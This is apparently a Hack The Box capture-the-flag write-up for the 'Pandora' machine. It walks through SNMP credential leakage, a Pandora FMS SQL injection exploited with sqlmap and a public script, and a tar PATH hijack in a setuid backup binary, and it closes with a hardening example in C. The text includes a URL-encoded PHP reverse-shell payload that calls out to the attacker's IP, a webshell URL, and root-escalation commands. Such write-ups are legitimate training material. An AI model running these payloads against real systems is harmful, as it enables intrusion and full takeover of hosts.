---
title: 'Pandora'
disqus: hackmd
tags: HTB
---

Pandora
===

[TOC]

# Overall

## Used Skill

- nmap UDP scan
- webshell
- exploit suid file
- hijack command

## Rating

- ⭐⭐⭐⭐⭐☆☆☆☆☆

# Recon

## nmap

- Port 80 only has what looks like a static page; the footer shows what appears to be a host name, `panda.htb`

```
~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.136
[sudo] password for eethan1:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 14:22 CST
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 41.31% done; ETC: 14:23 (0:00:09 remaining)
Stats: 0:00:49 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 14:23 (0:00:00 remaining)
Nmap scan report for 10.10.11.136
Host is up (0.41s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/28%OT=22%CT=1%CU=38457%PV=Y%DS=2%DC=T%G=Y%TM=6241548
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 995/tcp)
HOP RTT       ADDRESS
1   411.40 ms 10.10.14.1
2   411.19 ms 10.10.11.136
```

- Switched to a UDP scan and found an snmp service

```
~$ sudo nmap -sU -top-ports=30 panda.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 14:50 CST
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.41s latency).
Not shown: 28 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp
```

## sqlmap

![](https://hackmd.io/_uploads/HyVKFRAf5.png =300x300)

- The home page has a form for sending a message; after filling it in, it sends a GET to `http://panda.htb/?fullName=q&email=q%40e&phone=q&message=q`. Tried sqlmap with `sqlmap -u http://10.10.11.136/\?fullName\=%27\&email\=%27%40q\&phone\=%27\&message\=%27`, nothing found

## path brute

- Tried brute-forcing sub-paths with `gobuster dir -u http://10.10.11.136 -w ~/Documents/wordlists/rockyou.txt`, nothing much there

# Get Shell

- `snmpwalk -v 1 -c public 10.10.11.136 > snmp.txt` turns up a username `daniel` with password `HotelBabylon23`

![](https://hackmd.io/_uploads/B188v11Q9.png)

- After logging in over ssh, the flag turns out to be under another user

```
daniel@pandora:~$ find / -name "user.txt" 2> /dev/null
/home/matt/user.txt
```

- Checking the apache config turns up pandora.panda.htb

![](https://hackmd.io/_uploads/rksiFyymq.png)

- Hitting `pandora.panda.htb` from my own machine does not land on the correct virtual host; it has to be reached from inside the box (not sure why)
- Set up a proxy with `ssh -D 8080 daniel@panda.htb`
- Viewed locally, it is a Pandora FMS service; per [Pandora FMS 742: Critical Code Vulnerabilities Explained](https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained), there is a SQLi to exploit

```
$ proxychains sqlmap -u http://pandora.panda.htb/pandora_console/include/chart_generator.php\?session_id\=a -D pandora -T tsessions_php --dump
...
| eteshmpp2shihhj56vgn02jh54 | NULL                                                   | 1648459740 |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                               | 1641200284 |
| f609b4t5s8qvv9leh4l9m8opf1 | NULL                                                   | 1648459733 |
| fgrsvg6mpb4qe2pifr5knpq8bk | NULL                                                   | 1648459629 |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                   | 1638786504 |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                   | 1638786762 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                               | 1638783230 |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;    | 1638796349 |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                   | 1638786349 |
```

- Manually grabbing a session to become matt is still not enough; another [exploit](https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/blob/master/sqlpwn.py) uses the SQLi to write an admin session

```
# pandora.panda.htb has to point to 127.0.0.1 in /etc/hosts
tmp$ proxychains python sqlpwn.py -t pandora.panda.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
URL: http://pandora.panda.htb/pandora_console
[+] Sending Injection Payload
[proxychains] Strict chain  ...  127.0.0.1:8080  ...  127.0.0.1:80  ...  OK
[+] Requesting Session
[+] Admin Session Cookie : 1apq13c1m2t5oiie253scsm2ur
[+] Sending Payload
[proxychains] Strict chain  ...  127.0.0.1:8080  ...  127.0.0.1:80  ...  OK
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://pandora.panda.htb/pandora_console/images/pwn.php?test=
CMD >
```

- This exploit is basically still a webshell, but for some reason it would not pop a shell. Going through its code I found the webshell location, and opening it in the browser did pop one; since the cmd part is concatenated directly, the urlencoding was probably not handled properly: `http://pandora.panda.htb/pandora_console/images/pwn.php?test=php%20-r%20%27%24sock%3Dfsockopen(%2210.10.14.30%22%2C%2031596%20)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27`

# Privilege Escalation

- Look for suid files and get a proper shell

```
tmp$ nc -nvlp 31596
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::31596
Ncat: Listening on 0.0.0.0:31596
Ncat: Connection from 10.10.11.136.
Ncat: Connection from 10.10.11.136:46924.
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
matt@pandora:/var/www/pandora/pandora_console/images$ find / -perm -u=s -type f 2>/dev/null
<nsole/images$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
# the shell is restricted at this point
matt@pandora:/var/www/pandora/pandora_console/images$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
<(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
warning: commands will be executed using /bin/sh
job 8 at Mon Mar 28 14:19:00 2022
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
matt@pandora:/var/www/pandora/pandora_console/images$
```

- pandora_backup is a binary; run directly it looks like it is taking a backup. Used `ltrace` to see what it runs

```
matt@pandora:/var/www/pandora/pandora_console/images$ ltrace pandora_backup
ltrace pandora_backup
getuid()                                                   = 1000
geteuid()                                                  = 1000
setreuid(1000, 1000)                                       = 0
puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility
)                                                          = 26
puts("Now attempting to backup Pandora"...Now attempting to backup PandoraFMS client
)                                                          = 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                     = 512
puts("Backup failed!\nCheck your permis"...Backup failed!
Check your permissions!
)                                                          = 39
+++ exited (status 1) +++
```

- There is a tar command that can be hijacked; successfully got root

```
matt@pandora:/tmp$ echo "/bin/bash" > tar
echo "/bin/bash" > tar
matt@pandora:/tmp$ chmod 777 tar
chmod 777 tar
matt@pandora:/tmp$ PATH=.:$PATH
PATH=.:$PATH
matt@pandora:/tmp$ pandora_backup
pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp#
```
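The root cause visible in the ltrace output is that the setuid helper calls `system()` with a relative `tar`, so the caller's PATH decides which binary runs as root. As an added example (not the box's pandora_backup and not Pandora FMS code), the C below gives a check that flags PATH values like the `.:$PATH` used above, and a hardened replacement that runs an absolute tar path through `execve` under a fixed environment; the tar arguments and the `/var/www/pandora` source directory are assumptions.

```c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* The traced helper does system("tar -cvf /root/.backup/pandora-backup.tar.gz ...").
 * "tar" is relative, so /bin/sh resolves it through the invoking user's PATH
 * and a ./tar in the cwd runs with the helper's privileges. Fix: absolute
 * program path, no shell, and an environment the caller does not control. */

/* Returns 1 only if every PATH entry is an absolute directory. A "." entry or
 * an empty entry (leading, trailing or doubled colon) searches the current
 * directory. This does not judge whether the listed directories are writable. */
int path_env_is_trusted(const char *path)
{
    if (path == NULL || *path == '\0') return 0;
    for (const char *p = path;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len == 0 || p[0] != '/') return 0;   /* empty or relative entry */
        if (colon == NULL) return 1;
        p = colon + 1;
    }
}

/* Runs argv[0] (which must be an absolute path) directly via execve with a
 * fixed minimal environment, so nothing the invoking user exported is used.
 * Returns the child's exit status (127 if exec fails), or -1 on fork/wait
 * failure or an abnormal (signalled) exit. */
int run_fixed(char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(argv[0], argv, clean_env);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

/* Hardened equivalent of the backup call. The archive path is the one shown
 * in the ltrace output; the source directory is an assumed placeholder. */
int backup_hardened(void)
{
    char *const argv[] = { "/bin/tar", "-cf", "/root/.backup/pandora-backup.tar.gz",
                           "/var/www/pandora", NULL };
    return run_fixed(argv);
}
```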